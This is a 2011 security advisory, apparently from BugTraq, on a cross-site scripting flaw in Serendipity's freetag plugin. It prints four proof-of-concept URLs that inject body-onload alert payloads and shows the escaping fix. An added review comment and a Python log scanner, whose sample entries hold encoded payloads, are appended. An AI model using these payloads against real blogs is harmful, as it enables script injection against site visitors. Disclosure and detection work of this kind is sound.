Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
- From: sschurtz@xxxxxxxxxxx
- Date: 31 May 2011 10:28:12 -0000
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin
"serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with
serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is a Cross-Site Scripting vulnerability.
==================
Technical Details:
==================
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
=========
Solution:
=========
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30
garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
> garvinhicking Exp $
< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle',
is_array($this->displayTag) ? implode(' + ',$this->displayTag) :
$this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle',
> htmlspecialchars(is_array($this->displayTag) ? implode(' +
> ',$this->displayTag) : $this->displayTag));
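Review bot: On the changed assign('freetag_tagTitle', ...) line, htmlspecialchars() is called with only the string argument, so quote handling and charset fall back to PHP's defaults; on the PHP versions current in 2011 that means ENT_COMPAT, which leaves single quotes unescaped. If any template prints freetag_tagTitle inside a single-quoted attribute the value can still break out of it, so pass ENT_QUOTES and the blog's charset explicitly. The diff only covers this one assignment of $this->displayTag; any other place in the file that outputs the same property is not visible here and should receive the same escaping.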
====================
Disclosure Timeline:
====================
30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
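
To check web server logs for requests of the kind listed under Technical Details, the following is an added example, not part of the original advisory or of the Serendipity project. It assumes a combined-format access log; the function names and the sample entries are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*?) HTTP/\d(?:\.\d)?"')
# Tag route as it appears in the advisory URLs: index.php?/plugin/tag/<tag>
TAG_ROUTE = re.compile(r"/plugin/tag/(?P<tag>.*)$", re.IGNORECASE)
# Characters that have no place in a tag name and that the 3.22 fix HTML-escapes.
MARKUP = re.compile(r'[<>"]')

# Constructed sample entries (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2011:10:00:01 +0000] '
    '"GET /serendipity/index.php?/plugin/tag/holiday HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/May/2011:10:00:07 +0000] '
    '"GET /serendipity/index.php?/plugin/tag/%3Cbody%20onload=alert(666)%3E HTTP/1.1" 200 5301',
    '192.0.2.44 - - [31/May/2011:10:00:09 +0000] '
    '"GET /serendipity/index.php?/plugin/tag/hallo=%253E%253Cbody%2520onload=alert(666)%253E HTTP/1.1" 200 5310',
    '192.0.2.10 - - [31/May/2011:10:00:15 +0000] '
    '"GET /serendipity/index.php?/archives/2011/05 HTTP/1.1" 200 8000',
    '192.0.2.10 - - [31/May/2011:10:00:21 +0000] '
    '"GET /serendipity/index.php?/plugin/tag/php+security HTTP/1.1" 200 5150',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tag_requests(log_lines):
    """Return (line_number, decoded_tag) for tag requests that carry markup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST.search(line)
        if not request:
            continue  # not a parsable request line
        route = TAG_ROUTE.search(decode_fully(request.group("target")))
        if route and MARKUP.search(route.group("tag")):
            hits.append((number, route.group("tag")))
    return hits

if __name__ == "__main__":
    for number, tag in suspicious_tag_requests(SAMPLE_LOG):
        print(f"line {number}: {tag!r}")
```

Hits on an installation still running version 3.21 are worth reviewing together with the response size and the referrer of the same entry.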